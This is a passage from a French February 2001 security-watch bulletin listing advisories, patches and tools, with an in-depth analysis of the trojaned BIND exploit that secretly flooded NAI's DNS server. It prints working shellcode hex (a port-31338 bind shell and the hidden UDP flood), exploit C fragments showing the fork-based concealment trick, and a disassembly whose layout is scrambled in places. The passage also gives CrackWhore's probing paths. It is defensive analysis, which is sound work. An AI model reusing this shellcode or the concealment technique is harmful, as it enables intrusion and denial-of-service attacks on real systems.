Forte
11/02 Symantec PcAnywhere 9.0
Port en écoute (5631, 65301)
Mauvais traitement des données
Aucun correctif
Bugtraq
AUTRES INFORMATIONS
REPRISES D'AVIS
ET
CORRECTIFS
Les vulnérabilités suivantes, déjà publiées, ont été mises à jour, reprises par un autre organisme, ou ont
données lieu à la fourniture d'un correctif:
CIAC
Reprise de l'avis FreeBSD FreeBSD-SA-00:77
Le CIAC a publié, sous la référence L-036, l'avis FreeBSD FreeBSD-SA-00:77 concernant une vulnérabilité présente
dans le système de fichiers 'procfs'. Cette vulnérabilité permet à un utilisateur d'accroître ses privilèges.
Le CIAC a publié, sous la référence L-029 l'avis FreeBSD concernant les modules 'ipfw' et 'ip6fw'. Il était en effet
possible de rendre valide un paquet TCP normalement rejeté, sous certaines conditions . Le CIAC indique que la
version FreeBSD 4.3 n'est pas vulnérable.
dans 'periodic'. Cette vulnérabilité permet à un utilisateur ce compromettre certains fichiers par une attaque de
type lien symbolique.
dans 'sort'. Cette vulnérabilité permet à un utilisateur ce compromettre certains fichiers par une attaque de type
lien symbolique .
Le CIAC a publié, sous la référence L-047, l'avis FreeBSD FreeBSD-SA-01:24 concernant plusieurs vulnérabilités
affectant les paquetages 'openssh' et 'ssh' (SSH1) . Ces vulnérabilités permettent l'acquisition de privilèges plus
élevés ainsi que le déchiffrage de la session.
Reprise de l'avis Hewlett-Packard HPSBUX0101-137
Le CIAC a publié, sous la référence L-035, l'avis Hewlett-Packard HPSBUX0101-137 concernant une vulnérabilité
présente dans 'Support Tools Manager'.
Reprise de l'avis Red Hat RHSA-2001:013-05
Le CIAC a publié, sous la référence L-045, l'avis Red Hat RHSA-2001:013-05 concernant plusieurs vulnérabilités
dans les routines 'sysctl', 'ptrace' et 'mxcsr P4' du noyau Linux . Ces vulnérabilités permettent d'acquérir localement
des privilèges plus élevés et de provoquer un déni de service.
Page 30/42
Février 2001
Reprise de l'avis RedHat RHSA-2001:014-03
Le CIAC a repris, sous la référence L-048, l'avis Red Hat RHSA-2001:014-03 concernant un débordement de buffer
dans le paquetage 'vixie-cron'. Cette vulnérabilité permet d'acquérir des droits plus élevés.
Reprise de l'avis Sun #00196
Le CIAC a publié, sous la référence L-031, l'avis Sun #00196 concernant une vulnérabilité présente dans
'AnswerBook2'. Cette vulnérabilité permet à tout utilisateur d'accéder à l'interface d'administration d'Answerbook2
puis d'exécuter des commandes sur le serveur.
Le CIAC a publié, sous la référence L-033, l'avis Sun #00197 concernant une vulnérabilité présente dans Java Web
Server. Cette vulnérabilité permet d'utiliser le module d'administration afin d'exécuter du code sur le serveur.
Le CIAC a publié, sous la référence L-032, l'avis Sun #00199 concernant une vulnérabilité présente dans la
machine 'Java'. Cette vulnérabilité permet à une classe d'accéder à une autre classe et d'utiliser des fonctionnalités
non autorisées.
FREEBSD
Disponibilité de plusieurs correctifs
FreeBSD annonce la disponibilité des correctifs corrigeant les vulnérabilités présentes dans les paquetages:
inetd
FreeBSD-SA-01:11 (Revised)
periodic
FreeBSD-SA-01:12 (Revised)
sort
FreeBSD-SA-01:13
micq
FreeBSD-SA-01:14
tinyproxy
FreeBSD-SA-01:15
mysql
FreeBSD-SA-01:16
exmh2
FreeBSD-SA-01:17
bind
FreeBSD-SA-01:18
ja-xklock
FreeBSD-SA-01:19
mars_nwe
FreeBSD-SA-01:20
ja-elvis
FreeBSD-SA-01:21
dc20ctrl
FreeBSD-SA-01:22
telnetd_krb
FreeBSD-SA-01:25
http://www.linuxsecurity.com/advisories/
HP
Correctifs pour 'Support Tools Manager' (mise à jour)
HP vient de mettre à jour le bulletin HPSBUX0101-137. Il fournit une liste exhaustive des correctifs contre la
vulnérabilité affectant les 'Support Tools Manager'.
http://europe-support2.external.hp.com/
IBM
Disponibilité des correctifs pour 'bind'
IBM a publié, sous la référence MSS-SVA-E01-2001:002.1, un bulletin annonçant la prochaine disponibilité des
correctifs contre les vulnérabilités découvertes dans 'bind'. Cet avis est la première réponse d'IBM aux vulnérabilités
annoncées depuis 15 jours. Les correctifs seront bientôt disponibles pour AIX 4.3.3 sous la référence IY16182. Un
correctif temporaire est néanmoins téléchargeable à l'adresse suivante:
ftp://aix.software.ibm.com/aix/efixes/security/multiple_bind_vulns_efix.tar.Z
http://www-1.ibm.com/services/continuity/recover1.nsf/advisories/8525680F006B9445852569F300072DC0/$file/sva002.txt
ISS
Disponibilité de System Scanner 4.1.1
ISS annonce la disponibilité de la version de maintenance 4.1.1 de System Scanner 4.1. Cette version met à jour la
'console communications' (CAL) qui, dans de rares situations, provoquait une erreur appelant Dr. Watson. Cette
version prend en compte toutes les mises à jour précédentes. Aucune fonctionnalité de System Scanner n'a été
modifiée. Un accès client est nécessaire afin de télécharger cette mise à jour.
https://www.iss.net/cgi-bin/download/customer/customer-select.cgi
LINUX
Disponibilité du noyau version 2.4.1 pour Linux
La dernière version stable du noyau Linux est la version 2.4.1. Elle corrige notamment des vulnérabilités pouvant
mener à des attaques de type liens symboliques.
http://www.kernel.org/pub/linux/kernel/v2.4/
Page 31/42
Février 2001
LINUX DEBIAN
Disponibilité de nombreux correctifs
Debian annonce la disponibilité des correctifs corrigeant les vulnérabilités présentes dans les paquetages:
inn2
DSA-023-1
cron
DSA-024-1
OpenSSH
DSA-025-2
bind
DSA-026-1
OpenSSH
DSA-027-1
man-db
DSA-028-1
proftpd
DSA-029-1
xfree86
DSA-030-2
http://lists.debian.org/debian-security-announce-01
LINUX MANDRAKE
Mandrake annonce la disponibilité des correctifs corrigeant les vulnérabilités présentes dans les paquetages:
bind
MDKSA-2001:017
kdesu
MDKSA-2001:018
xemacs
MDKSA-2001:019
cups
MDKSA-2001:020-1
proftpd
MDKSA-2001:021
vixie-cron
MDKSA-2001:022
cups
MDKSA-2001:023
http://www.linux-mandrake.com/en/security
LINUX REDHAT
RedHat annonce la disponibilité des correctifs corrigeant les vulnérabilités présentes dans les paquetages:
inetd
RHSA-2001:006-03
bind
RHSA-2001:007-03
xemacs
RHSA-2001:010-06
xemacs
RHSA-2001:011-03
kernel
RHSA-2001:013-05
vixie-cron
RHSA-2001:015-03
Http://www.linuxsecurity.com/advisories/
NetBSD
RedHat annonce la disponibilité des correctifs corrigeant les vulnérabilités présentes dans les paquetages:.
bind
NetBSD-SA2001-001
Ssh/openssh
NetBSD-SA2001-003
ftp://ftp.netbsd.org/pub/NetBSD/misc/security/advisories/
ORACLE
Disponibilité de la mise à jour Oracle JSP 1.1.2.0.0
Oracle vient de mettre à disposition la mise à jour d'Oracle JSP, Apache/JServ version 1.1.2.0.0. Cette version
corrige la vulnérabilité découverte par Guninski.
Parade contre la vulnérabilité 'Oracle JVM'
Oracle vient de proposer une parade contre la vulnérabilité affectant la 'Machine Virtuelle Java Oracle JSP/SQLJSP' .
La solution proposée est d'accorder explicitement les permissions au répertoire contenant le document.
TIS/NAI
Correctif pour Gauntlet et Webshield
TIS/NAI a publié un correctif pour Gauntlet 4.2, 5.0, 5.5 et E-ppliance 300 1.0 et 1.5 qui résout plusieurs
vulnérabilités dans BIND. Ce correctif est restreint aux possesseurs d'un numéro d'accès.
http://www.pgp.com/naicommon/download/upgrade/upgrades-pgp.asp
Page 32/42
Février 2001
VANDYKE
Disponibilité de la version 'VShell 1.0.2'
Van Dyke Technologies annonce la mise à jour de VShell en version 1.0.2. Une vulnérabilité dans les précédentes
versions permettait d'exécuter du code à distance dans un contexte local, sous Windows NT 4.0 et 2000.
@Stake possède un code d'exploitation qui ne sera révélé qu'à la fin du mois de février 2001.
http://www.vandyke.com/products/vshell/security102.html
CODES D'EXPLOITATION
Les codes d'exploitation des vulnérabilités suivantes ont fait l'objet d'une large diffusion:
BIND
BugTaq vecteur involontaire d'une attaque contre NAI
NAI a été victime d'attaques involontaires, majoritairement causées par les abonnés de la liste Bugtraq. En effet, un
code exploitant les récentes vulnérabilités de BIND, posté sur la liste, provoquait une attaque dirigée vers les
serveurs DNS de Network Associates, heureusement protégés. NAI a néanmoins subi un flux continu de requêtes,
par près d'un quart des abonnés Bugtraq, paralysant les serveurs pendant au moins une heure trente. Le code
d'exploitation a été supprimé de la liste par les modérateurs.
http://www.bull.fr/securinews/courant/41-01_3.html
CISCO
Détail de l'alerte sur Cisco CSS (Arrowpoint)
@stake a publié un bulletin expliquant dans les détails les vulnérabilités présentes dans les commutateurs Cisco
CSS (Arrowpoint) .
http://www.atstake.com/research/advisories/2001/a013101-1.txt
FreeBSD
Code d'exploitation concernant la vulnérabilité 'ipfw'
Un code d'exploitation concernant la vulnérabilité affectant les modules 'ipfw' et 'ip6fw' sur FreeBSD a été publié
sur Securiteam.
http://www.securiteam.com/unixfocus/ECEpass_-_proof_of_concept_code_for_FreeBSD_ipfw_bypass.html
SSH
Code d'exploitation de la vulnérabilité 'deattack.c'
Un article détaillé exposant une technique d'exploitation du débordement de buffer présent dans le module
'deattack.c' a été publié dans la liste BugTraq. Le code proposé permet, moyennant cependant quelques essais et
tests difficilement réalisables en aveugle, d'ouvrir une connexion SSH sous l'autorité du compte 'root', sans
authentification.
BULLETINS ET NOTES
Les bulletins d’information suivants ont été publiés par les organismes officiels de surveillance et les
éditeurs:
AXENT/SYMANTEC
Mise à jour pour NetProwler 3.5x (SU3)
La mise à jour pour NetProwler 3.5x permet à un agent 'Intruder Alert' d'être notifié via les 'trap' SNMP lors de la
reconnaissance d'une signature.
http://www2.axent.com/swat/index.cfm?Doc=2001_01_31
CERT
Mise à jour de la page 'Security Improvement Modules'
Le CERT a mis à jour sa page intitulée 'Security Improvement Modules' (modules visant à améliorer la sécurité).
Deux modules concernant 'Solaris 2.x' ont été ajoutés :
34. Disabling user accounts on systems running Solaris 2.x
35. Installing OpenSSL to ensure availability of cryptographic libraries on systems running Solaris 2.x.
http://www.cert.org/security-improvement/index.html#uaSSL
CIAC
Bulletin d'informations sur le ver 'Ramen'
Le CIAC a publié, sous la référence L-040, un bulletin d'information au sujet du ver 'Ramen' . Il propose une
méthode permettant d'éradiquer 'Ramen' d'un système ayant été attaqué et reprend sommairement les
vulnérabilités exploitées (wu-ftp, LPRng, rpc.statd).
Page 33/42
Février 2001
EEYE
eEye Digital Security annonce Retina 3.0
Le passage de la version 2.0 à la 3.0 de Retina est présenté comme un pas de géant par l'éditeur. Retina 3.0 inclut
la vérification de centaines de nouvelles vulnérabilités. De plus, la totale réécriture du moteur de détection fait de
Retina le plus complet et le rapide des scanners actuellement sur le marché.
http://www.eeye.com/html/Products/Retina/overview.html
MANDRAKESOFT
Disponibilité de la version bêta de Mandrake Security
Mandrake Security est un projet Open Source sous licence GPL dont le but est la création d'un firewall / routeur
configurable via une interface web. Le projet utilise des technologies XML, PhP et Apache.
http://www.linux-mandrake.com/fr/pr-firewallbeta.php3
LINUX REDHAT
Red Hat Linux 'Wolverine' version bêta
Red Hat vient d'annoncer la nouvelle version bêta de sa distribution Linux. Baptisée 'Wolverine', elle inclut les
derniers paquetages (kernel 2.4.1, glibc 2.2.2, XFree86 4.0.2) et apporte des améliorations notables au niveau du
support USB. Cependant, il est recommandé de ne pas utiliser les versions bêta en production et d'attendre la
version stable.
https://listman.redhat.com/pipermail/redhat-watch-list/2001-February/000252.html
ATTAQUES
OUTILS
HACKERWATCH.ORG
Description
Le site 'HackerWatch.org', administré par la société NeoWorx et éditeur des produits NeoTrace et NeoWatch, a
pour mission de centraliser les alertes générées par les systèmes de détection d'intrusion. L'objectif annoncé est de
pouvoir détecter et identifier l'origine des différentes attaques distribuées de plus en plus rencontrées sur l'Internet
A ce jour, la collecte de données est limitée aux événements générés par l'outil d'analyse NeoTrace Pro et le parefeu personnel NeoWatch qui disposent d'un mécanisme de soumission automatique. Une extension du service à
d'autres outils est annoncée sans autre précision.
Un service d'alerte gratuit est planifié qui permettra d'informer en temps réel les utilisateurs de l'apparition d'une
nouvelle menace. Les informations publiées par ce service, qui utilise les résultats de l'analyse et de la corrélation des
données acquises, ne contiendront aucune adresse IP afin d'éviter l'exploitation de ces résultats par un tiers mal
intentionné.
Pour autant qu'elle puisse apparaître louable, cette initiative dont on espère qu'elle n'est pas uniquement dictée par le
marketing commercial reste fragilisée par le choix d'une unique source de donnée: une gamme de produits encore peu
répandus. Rappelons que le projet CIDER, engagé par l'une des sections de la marine américaine et soutenu par les
principaux organismes de sécurité, a conduit au développement d'un outil, Shadow, offrant un service similaire bien
que non encore coordonné au niveau mondial. N'oublions pas le remarquable projet arachNIDS lancé autour de la
mise en commun de signatures SNORT par un consultant et ex-pirate MaxVision.
Notons enfin que la société NeoWorx vient d'annoncer la disponibilité de la version commerciale du pare-feu
personnel NeoWatch (notre rapport de veille N°30 du mois de Janvier 2001), version fonctionnant sous Windows™
95, 98, ME, 2000 mais aussi désormais sous NT4.
http://www.hackerwatch.org/faq/
http://www.nswc.navy.mil/ISSEC/CID
http://www.whitehats.com/ids/index.html
TRIANGLE BOY
Description
'SafeWeb', fournisseur d'accès WEB anonyme, annonce la prochaine disponibilité du logiciel 'Triangle Boy' destiné
renforcer l'anonymat des connexions WEB. La copie de la notice d'information, proposé ci-après, précise que cet outil
serait à même de traverser les dispositifs de sécurité mis en place. Il est, en conséquence, fort probable que 'Triangle
Boy' utilise un mécanisme de tunnel - paramétrable en fonction des filtres de sécurité - établi entre le client et un
service de relayage.
Want to help promote democracy and allow users around the world to have access to an uncensored Web? You will
soon be able to do just that, by downloading our soon-to-be-released application, Triangle Boy.
Page 34/42
Février 2001
Corporations, governments, and other entities have begun to block access to SafeWeb in an effort to thwart our
mission to promote the free flow of information and ideas on the Internet and to protect the online privacy rights of
all Internet users.
Triangle Boy is a free, open source, peer-to-peer application that will bypass firewalls and other mechanisms that
attempt to block access to SafeWeb. Users who are currently blocked from directly accessing SafeWeb (or any other
site) will be able to access it indirectly through any other computer running Triangle Boy.
Triangle Boy is scheduled for release at the end of February. Volunteers will be able to download the application
from the SafeWeb site at www.safeweb.com.
A première vue sans danger, 'Triangle Boy' est cependant un produit à surveiller de près d'autant qu'il apparaît avoir
été développé à l'origine pour la CIA qui possède une prise de participation dans SafeWeb via son "incubateur" In-QTel. Cette information publiée mi-Février par SafeWeb, et relayée par de nombreux journaux Américains dont le
WallStreet Journal, laisse sous-entendre que le service d'anonymisation en ligne puisse servir d'autres intérêts …
En réaction à ces annonces, le webmaster du site de veille indépendant Cotse.com, ou 'The Church of the
Swimming Elephant, indique dans la liste de diffusion alt.2600 qu'une version évoluée de l'utilitaire 'LeapFrog'
offrant le même service sera disponible dans les semaines à venir sur son site:
"…
Regarding safeweb. I get a kick out of this hype for "triangle-boy", it is basically a modified version of Leapfrog. So,
we are now almost done modifying Leapfrog to release our own version. We currently have it working and are just
ironing out a few glitches now. It will hopefully be released mid-end week this week or maybe next...with no CIA
involvement or financing ;) We will most likely release it open source too.
…
Stephen K.Gielda
"
Notons à ce propos l'existence d'un autre produit garantissant la furtivité des accès Internet - NetEraser - développé
par la société SAIC (Science Applications International), société ayant elle aussi fait d'objet d'une prise de
participation en février 2000 par In-Q-Tel.
https://fugu.safeweb.com/webpage/press_room/tboy.html
http://groups.google.com/groups?q=Re:+Cotse+nears+3+million+hits+a+week&hl=en&lr=&safe=off&rnum=1&seld=917935185&ic=1
SITE VULNERABILITIES.ORG
Description
Le site 'Vulnerabilities.org' géré par deux administrateurs systèmes américains propose entre autres services, deux
services gratuits d'audit à distance.
Le service 'MyHost NMAP Portscan' autorise le sondage
des ports actifs d'un système dont l'adresse IP ou le nom
de domaine aura été préalablement fourni. Ce service est
basé sur l'utilitaire bien connu 'nmap' (version utilisée:
2.54Beta).
Le service 'MyHost Vulnerability Scan' complète
l'analyse précédente en s'intéressant aux vulnérabilités
exploitables à distance sur le système d'où provient la
requête de connexion. L'utilitaire 'Nessus' est utilisé
avec une bibliothèque de plus de 580 tests.
Une troisième service, dénommé 'Any Host Scan', dont
l'accès est réservé aux clients enregistrés, permet
d'étendre le service précédent à un ensemble de
machines. Un processus d'analyse récurrent est proposé.
Cette 'offre' confirme l'intérêt porté aux logiciels d'audit
disponibles en 'OpenSource', dont principalement
'nmap'et 'Nessus', par de nombreuses 'jeunes pousses'.
Notons que, si le service de sondage de port peut être
initié contre n'importe quel système dont l'adresse IP ou
le nom est connu, le service d'analyse de vulnérabilité
est, lui, limité à l'adresse d'origine de la requête.
Il est fort probable que les services de ce type puissent faire l'objet d'une utilisation abusive bien que, dans le cas
présent, l'utilisateur soit averti que toutes ses requêtes seront journalisées.
Les procédures de sécurité doivent en conséquence prendre en compte l'existence de tels services: l'origine de toute
tentative de sondage devra être validée afin de vérifier qu'un service 'commercial' n'est pas à la source du problème.
Si tel est le cas, il sera nécessaire de déterminer si cet 'audit' est le fait d'un commanditaire interne ou d'un tiers
externe à la société, ce qui suppose d'analyser les journaux des dispositifs de sécurité du point d'accès de l'entreprise.
La présence de traces de connexion sur le site offrant le service peu de temps avant le sondage permettra de
confirmer l'origine interne et de prendre les mesures qui s'imposent.
Page 35/42
Février 2001
http://www.vulnerabilities.org/analysis.html
CRACKWHORE 2.2 Description
L'utilitaire 'CrackWhore' a dernièrement fait l'objet de différents articles dans la presse spécialisée.
Cet outil d'attaque (ou de test) de sites WEB intègre en
effet une fonctionnalité, activée par défaut, permettant de
publier la liste des sites et des comptes d'accès ayant été
crackés.
La publicité faite aux outils d'audit et d'attaque à la suite
d'un article de presse conduit souvent à une
recrudescence d'attaque dans les semaines qui suivent.
Nous avons en conséquence voulu tester 'CrackWhore'
pour déterminer l'intérêt d'une utilisation comme outil
d'audit mais aussi valider la menace présentée par cet
utilitaire.
Livrée sous forme exécutable, écrite en Visual Basic 6, la
version 2.2 est distribuée avec un dictionnaire de 15088
couples identifiant/mot de passe et un fichier contenant
160 tests de vulnérabilités WEB. Ces fichiers peuvent être
édités afin d'ajouter de nouveaux tests.
Une fonction permettant de masquer l'origine des
connexions peut être activée. Il faut pour cela renseigner
une liste de serveurs Proxy-HTTP chargés de masquer
l'adresse IP source.
Une option autorise le changement régulier du serveur
utilisé ceci dans l'optique de renforcer l'anonymat. Notons
la présence sur le site 'SubReality' d'un script destiné à
qualifier la qualité d'un Proxy HTTP.
En pratique, et bien que l'outil soit ergonomique, de nombreux défauts dont l'impossibilité de disposer des sources, le
rendent inutilisable en tant qu'outil de test. Parmi les problèmes constatés, notons l'impossibilité de tester un site
utilisant SSL ou un port non standard, la pauvreté de la documentation, la présence d'une fonction de publication
activée par défaut (documentée) et d'une fonction d'activation d'un bandeau publicitaire (non documentée).
Comme souvent, une rapide étude du binaire du programme révèle beaucoup d'informations utiles sans avoir à
préalablement lancer le produit:
Le chargement d'un fichier 'ads.dat' contenant les URL des bandeaux publicitaires,
L'URL et les variables utilisées pour transmettre les résultats: un POST sur '/scripts/cgi/passwords.cgi' avec les
variables suivantes: task="add" & name ="xxx" & url ="xxx" & cracker = "CrackWhore"
La technique de recherche des pages protégées à l'aide des préfixes 'représentatifs' suivants: /members/,
/members-area/, /mem/, /m/, /private/, /priv/, /protected/, /protect/, /resctricted/ (noter l'erreur de frappe),
/restrict/, /authorize/, /authorise/, /auth/, galleries/, /gallery/, /secured/, /secure/, /s/
Notons que la technique de transmission des résultats, non sécurisé, peut être mise à profit pour saturer le site de
fausses informations, ou mesurer son audience en transmettant des références d'accès pointant sur un attrapemouche …
http://www.subreality.net/
TECHNIQUES
ATTAQUE INDIRECTE DU SITE NAI
Description
Le 31 janvier 2001, BugTraq, la célèbre liste de diffusion hébergée par Security Focus a involontairement été à
l'origine des attaques en déni de service perpétrées contre la société NAI au début du mois de février. Un code
d'exploitation de l'une des nombreuses vulnérabilités découvertes dans le service 'bind' a en effet été diffusé avec
l'approbation des modérateurs de la liste. Approbation trop rapide puisqu'il est rapidement apparu que ce code
contenait en réalité une fonction masquée destinée à explicitement attaquer le serveur DNS de la société NAI.
Il apparaît qu'une analyse superficielle du code publié ne permet pas de juger de l'innocuité du dit code, code
remarquablement architecturé. Tout utilisateur ayant exécuté ce code a ainsi immédiatement et 'involontairement'
participé à une attaque distribué en déni de service (DdoS).
Notons à ce sujet et comme le souligne un utilisateur de la liste que la faute ne revient pas aux modérateurs de
Bugtraq car ils ne rejettent que les messages n’adhérant pas à la politique de la liste. Les personnes utilisant
aveuglément un code diffusé sur l’Internet ne récoltent que ce qu’ils ont semé. Et ce jour-là, ils ont semé la panique !
Page 36/42
Février 2001
Une analyse approfondie du code révèle des procédés de dissimulation fort intéressants qui vont être détaillés.
Comme pour tout code d'exploitation d'un débordement de buffer, le code diffusé est constitué des deux modules
complémentaires:
1. un code exécuté localement, conçu pour déclencher le débordement de buffer par exploitation d'un problème
spécifique dans l'application distante,
2. un code assembleur, dit 'shellcode', placé sur la pile du système distant et exécuté par celui-ci à la suite du
débordement de buffer.
Comme pour tout code d'exploitation d'un débordement de buffer, le regard de l'analyste se porte en priorité sur le
'shellcode' à la recherche de la fonction active, généralement marqué par la présence d'une chaîne référençant un
shell tel que '/bin/sh', d'un appel système marqué par la chaîne 'cd 80' en environnement Linux/Intel et la présence
d'un JMP en en-tête du code.
Le code publié contient bien les 'shellcodes', un par système d'exploitation cibles:
Char linux_shellcode[] = /* modifyed Aleph1 linux shellcode to
* bind to tcp port 31338. hey aleph1
* :) */
"\xeb\x34\x5e\xbb\x01\x00\x00\x00\x89\xf1\xb8\x66\x00\x00\x00\xcd"
"\x80\x89\x46\x14\x8d\x46\x30\x89\x46\x18\x31\xc0\x89\x46\x20\x8d"
"\x46\x0c\x89\x46\x24\xb8\x66\x00\x00\x00\xbb\x0b\x00\x00\x00\x8d"
"\x4e\x14\xcd\x80\xeb\xef\xe8\xc7\xff\xff\xff\x02\x00\x00\x00\x02"
"\x00\x00\x00\x11\x00\x00\x00\x02\x00\x00\x35\xa1\x45\x03\x96\xff"
"\xff\xff\xff\xef\xff\xff\xff\x00\x04\x00\x00\x00\x00\x00\x00\x02"
"\x5f\x9a\x80\x10\x00\x00\x00/bin/sh\0";
char bsd_shellcode[] =
/* freebsd bind shellcode by LaMerZ , thnx :) */
"\xeb\x37\x5e\x6a\x11\x6a\x02\x6a\x02\x6a\x66\x8d\x05\x61\x00\x00"
"\x00\xcd\x80\x89\xc2\x6a\x10\x89\xf0\x50\x31\xc0\x50\x68\x24\x10"
"\x00\x00\x8d\x46\x0f\x50\x52\x68\x88\x00\x00\x00\x8d\x05\x85\x00"
"\x00\x00\xcd\x80\x83\xc4\x1c\xeb\xdc\xe8\xc4\xff\xff\xff\x00\x02"
"\x00\x35\xa1\x45\x03\x96\xe8\xb1\xff\xff\xff/bin/sh\0";
LINUX
Un JUMP
Un Appel Système
Un indice …
Un Shell
BSD
Un JUMP
Un Appel Système
Un Shell
Le code publié contient aussi un module d'activation conforme à la fonction annoncée:
1. Ouverture d'une connexion UDP sur le port DNS et transmission du code, préalablement paramétré et copié
dans le buffer de travail 'expl_buffer':
…
…
memcpy(expl_buffer, shellcode, PACKETSZ);
…
…
to.sin_family = AF_INET;
to.sin_port = htons(53);
Service DNS
to.sin_addr.s_addr = remote_ip;
Adresse de la cible
if ((sendto(fd, &expl_buffer, PACKETSZ, 0, (struct sockaddr *) &
to, sizeof(struct sockaddr)) != PACKETSZ))
{
perror("sendto");
exit(1);
}
2.
Envoi buffer 'expl_buffer'
Ouverture d'une connexion vers un port du système distant supposé avoir été ouvert par le shellcode.
if ((fd2 = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0)
Un SOCKET TCP
{
perror("socket");
exit(1);
}
/* linux & freebsd shellcodes bindport is same, so dont even check. */
to.sin_port = htons(31338);
Le PORT distant
if (connect(fd2, (struct sockaddr *) & to, sizeof(struct sockaddr)) < 0) Une connexion TCP
{
perror("connect");
exit(1);
}
Ainsi, le code publié est conforme au modèle désormais classique d'un code d'exploitation. Bien sur, un tel code s'il
devait être exécuté - à des fins de validation et non dans un but de malveillance - le sera dans un environnement
isolé afin d'éviter toute propagation sur le système d'information et l'Internet.
Dans ces conditions, l'analyste ne manquera pas de constater la tentative de connexion vers le service DNS cible dont
l'adresse est passée en paramètre mais aussi un grand nombre de tentatives effectuées vers une adresse inconnue
161.69.3.150, en pratique celle du DNS de NAI.
Un examen plus attentif révèle alors l'utilisation de la fonction 'fork', rarement usitée dans les codes d'exploitation de
ce type:
int set_ptr(char *buff, int offset, unsigned long val, int s)
Page 37/42
Février 2001
{ ...
if (s)
if (!fork()) /* simply copy value to offset */
memcpy(&copy_buff[offset], &val, sizeof(val));
...
}
Ce code conduit à dupliquer le processus à partir du point d'appel de la fonction fork puis à copier le contenu du buffer
'val' dans le buffer 'copy_buff' à partir de la position 'offset'.
Il n'y a rien à dire à ce niveau mais l'examen de l'un des appels de la fonction 'set_ptr' met en évidence la
remarquable astuce utilisée:
set_ptr(shellcode, BIND_OFF_02, (unsigned long) shellcode, 1);
Le shellcode est recopié sur lui-même avec un décalage de BIND_OFF_02 (1028 octets) provoquant ainsi un
débordement de buffer LOCAL dans le processus fils entraînant en conséquence l'exécution LOCALE du
shellcode.
Un superbe tour de passe-passe parfaitement réussi et difficilement détectable d'autant que le processus père continu
son travail !
Notons que les autres appels à la fonction 'set_ptr' ne sont présents que pour le 'décors' car le code actif est inactivé
par le passage de la valeur 0 (FALSE) dans le paramètre 's'.
set_ptr(shellcode, BIND_OFF_01, SHELL_OFFSET_2, 0);
set_ptr(shellcode, BIND_OFF_03, i, 0);
set_ptr(shellcode, BIND_OFF_04, remote[type].ret + (i * remote[type].otebp), 0);
L'étude du shellcode confirme qu'il contient un code assembleur entraînant la transmission ininterrompu d'un paquet
UDP sur le service DNS du système dns1.nai.com entraînant la saturation de celui-ci. Une fonction C équivalente du
shellcode serait:
fd = socket(PF_INET, SOCK_DGRAM, IPPROTO_UDP)
while (1) sendto(fd, somedata, 1024, 0,
, 16);
Un désassemblage commenté d'un partie du 'shellcode' est proposé ci-après
Offset
Instruction
@=0
<@+54>
<@+02>
<@+03>
<@+08>
<@+10>
<@+15>
Jmp 0x8049576 <@+54>
call0x8049542 <@+02>
Pop %esi
Mov $0x1,%ebx
Mov %esi,%ecx
Mov $0x66,%eax
Int $0x80
<@+17> Mov
<@+20> Lea
<@+23> Mov
<@+26> Xor
<@+28> Mov
<@+31> Lea
<@+34>
<@+37>
<@+42>
<@+47>
Mov
Mov
Mov
Lea
<@+50> int
<@+52> jmp
<@+37>
<@+59>
Commentaire
Le 'call' permet de récupérer l'adresse des données situées juste après <@+59>
On place l'adresse des données dans %esi
On place 0x1 dans %ebx (0x1 = 1 correspond au numéro d'appel système 'sys_socket')
On place %esi dans %ecx (%esi = <@+59> soit l'adresse des données)
On place 0x66 dans %eax (0x66 = 102 correspond au numéro d'appel syst. 'socketcall')
Exécution de l'appel système (interruption 0x80) avec les données
<@+59>
0x00000002
0x00000002
0x00000011
Soit
Family
= 2
(AF_INET, <linux/socket.h>)
Type
= 2
(SOCK_DGRAM, <asm/socket.h>)
Protocol = 0x11 (17, UDP, <linux/in.h>)
Le descripteur de socket est retourné dans %eax
%eax,0x14(%esi)
On place %eax (descripteur de socket) à l'adresse <@+79> (%esi+0x14 = 59+20)
0x30(%esi),%eax
On place l'adresse de <@+107> (%esi+0x30 = 59+48) dans %eax
L'adresse en question correspond au code d'exploitation
%eax,0x18(%esi)
On place cette adresse dans <@+83> (%esi+0x18 = 59+24)
%eax,%eax
Positionne %eax à zéro
%eax,0x20(%esi)
On place %eax (qui est à zéro) dans <@+91> (%esi+0x20 = 59+32)
Cette adresse est normalement réservée par les 'flags'
0xc(%esi),%eax
On récupère l'adresse de <@+71> (%esi+0xc = 59+12) dans %eax
Adresse du 'struct sockaddr_in' pour 'sys_sendto'
%eax,0x24(%esi)
On place cette adresse dans <@+95> (%esi+0x24 = 59+36)
$0x66,%eax
On place 0x66 dans %eax (0x66 = 102 correspond au numéro d'appel système 'socketcall')
$0xb,%ebx
On place 0xb dans %ebx (0x0b = 11 correspond au numéro d'appel système 'sys_sendto')
0x14(%esi),%ecx
On place l'adresse de <@+79> (adresse des arguments) dans %ecx
Avec
<@+71>
0x35000002
0x960345a1
0xffffffff
0xffffffef
<@+87>
0x00000400
0x00000000
0x809a5f02
0x00000010
<@+103> 0x6e69622f
0x0068732f
Soit en tenant compte des paramètres d'appel de la fonction:
fs
= contenu de <@+79> Valeur reçue de l'appel de socket
buff
= contenu de <@+83> adresse de <@+107> (code d'exploitation)
len
= contenu de <@+87> 0x400 soit 1024 caractères qui seront envoyés
flags
= contenu de <@+91> 0 soit pas de 'flag' spécial
addr
= contenu de <@+95> adresse de <@+71> (struct sockaddr_in)
addr_len = contenu de <@+99> 0x10 (16 octets longueur de struct sockaddr)
Et de la définition de la structure sockaddr_in
sin_family = 0x0002 (AF_INET)
sin_port
= 0x3500 (soit 53)
sin_addr
= 0x96 0x03 0x45 0xa1 (soit 161.69.3.150 => dns1.nai.com)
$0x80
Exécution de l'appel système (interruption 0x80)
0x8049565 <@+37> Puis retour à l'adresse <@+37>
On boucle à l'infini entre les adresses <@+37> et <@+52>
Emplacement des données
Page 38/42
Février 2001
La technique de dissimulation employée par l'auteur de ce code est remarquable et pourrait hélas faire 'tâche d'huile'
d'autant que la création d'un module générique amélioré est une tâche aisée.
Notons à ce sujet que de nombreuses analyses publiées
dans BugTraq ont incorrectement interprété le
fonctionnement du mécanisme de déclenchement de
l'attaque.
Par ailleurs, aucune analyse ne mentionne que le
système cible est réellement attaqué par l'envoi d'un
paquet contenant une copie spécifiquement paramétrée
du même shellcode !
Le système cible devient alors partie prenante de
l'attaque distribuée sur NAI. En pratique, cet effet
secondaire n'a pas été remarqué, les systèmes Linux
RedHat 6.2 - majoritaires à ce jour - utilisant la
distribution 'bind' installée par défaut étant, par
chance, immune à l'attaque TSIG sélectionnée.
Système
source
Fork
Shell
Code
Père
Shell
Code
UDP/53
Cible
